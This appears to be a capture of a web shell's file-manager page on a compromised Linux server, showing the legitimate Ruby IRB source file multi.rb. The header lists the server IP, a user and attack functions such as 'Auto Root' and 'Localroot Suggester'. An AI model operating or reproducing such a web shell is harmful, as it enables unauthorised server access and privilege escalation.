Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ruby /
irb /
command /
Delete
Unzip
Name
Size
Permission
Date
Action
backtrace.rb
262
B
-rw-r--r--
2026-04-07 17:22
base.rb
1.2
KB
-rw-r--r--
2026-04-07 17:22
break.rb
254
B
-rw-r--r--
2026-04-07 17:22
catch.rb
254
B
-rw-r--r--
2026-04-07 17:22
chws.rb
826
B
-rw-r--r--
2026-04-07 17:22
context.rb
405
B
-rw-r--r--
2026-04-07 17:22
continue.rb
259
B
-rw-r--r--
2026-04-07 17:22
debug.rb
2.23
KB
-rw-r--r--
2026-04-07 17:22
delete.rb
256
B
-rw-r--r--
2026-04-07 17:22
disable_irb.rb
292
B
-rw-r--r--
2026-04-07 17:22
edit.rb
1.65
KB
-rw-r--r--
2026-04-07 17:22
exit.rb
257
B
-rw-r--r--
2026-04-07 17:22
finish.rb
255
B
-rw-r--r--
2026-04-07 17:22
force_exit.rb
267
B
-rw-r--r--
2026-04-07 17:22
help.rb
2.86
KB
-rw-r--r--
2026-04-07 17:22
history.rb
1.09
KB
-rw-r--r--
2026-04-07 17:22
info.rb
252
B
-rw-r--r--
2026-04-07 17:22
internal_helpers.rb
793
B
-rw-r--r--
2026-04-07 17:22
irb_info.rb
1.14
KB
-rw-r--r--
2026-04-07 17:22
load.rb
2.01
KB
-rw-r--r--
2026-04-07 17:22
ls.rb
4.29
KB
-rw-r--r--
2026-04-07 17:22
measure.rb
1.35
KB
-rw-r--r--
2026-04-07 17:22
next.rb
251
B
-rw-r--r--
2026-04-07 17:22
pushws.rb
1.31
KB
-rw-r--r--
2026-04-07 17:22
show_doc.rb
1.17
KB
-rw-r--r--
2026-04-07 17:22
show_source.rb
1.84
KB
-rw-r--r--
2026-04-07 17:22
step.rb
251
B
-rw-r--r--
2026-04-07 17:22
subirb.rb
2.85
KB
-rw-r--r--
2026-04-07 17:22
whereami.rb
435
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
# frozen_string_literal: true # # multi.rb - # by Keiju ISHITSUKA(keiju@ruby-lang.org) # module IRB # :stopdoc: module Command class MultiIRBCommand < Base include RubyArgsExtractor private def print_deprecated_warning warn <<~MSG Multi-irb commands are deprecated and will be removed in IRB 2.0.0. Please use workspace commands instead. If you have any use case for multi-irb, please leave a comment at https://github.com/ruby/irb/issues/653 MSG end def extend_irb_context # this extension patches IRB context like IRB.CurrentContext require_relative "../ext/multi-irb" end def print_debugger_warning warn "Multi-IRB commands are not available when the debugger is enabled." end end class IrbCommand < MultiIRBCommand category "Multi-irb (DEPRECATED)" description "Start a child IRB." def execute(arg) args, kwargs = ruby_args(arg) execute_internal(*args, **kwargs) end def execute_internal(*obj) print_deprecated_warning if irb_context.with_debugger print_debugger_warning return end extend_irb_context IRB.irb(nil, *obj) puts IRB.JobManager.inspect end end class Jobs < MultiIRBCommand category "Multi-irb (DEPRECATED)" description "List of current sessions." def execute(_arg) print_deprecated_warning if irb_context.with_debugger print_debugger_warning return end extend_irb_context puts IRB.JobManager.inspect end end class Foreground < MultiIRBCommand category "Multi-irb (DEPRECATED)" description "Switches to the session of the given number." def execute(arg) args, kwargs = ruby_args(arg) execute_internal(*args, **kwargs) end def execute_internal(key = nil) print_deprecated_warning if irb_context.with_debugger print_debugger_warning return end extend_irb_context raise CommandArgumentError.new("Please specify the id of target IRB job (listed in the `jobs` command).") unless key IRB.JobManager.switch(key) puts IRB.JobManager.inspect end end class Kill < MultiIRBCommand category "Multi-irb (DEPRECATED)" description "Kills the session with the given number." def execute(arg) args, kwargs = ruby_args(arg) execute_internal(*args, **kwargs) end def execute_internal(*keys) print_deprecated_warning if irb_context.with_debugger print_debugger_warning return end extend_irb_context IRB.JobManager.kill(*keys) puts IRB.JobManager.inspect end end end # :startdoc: end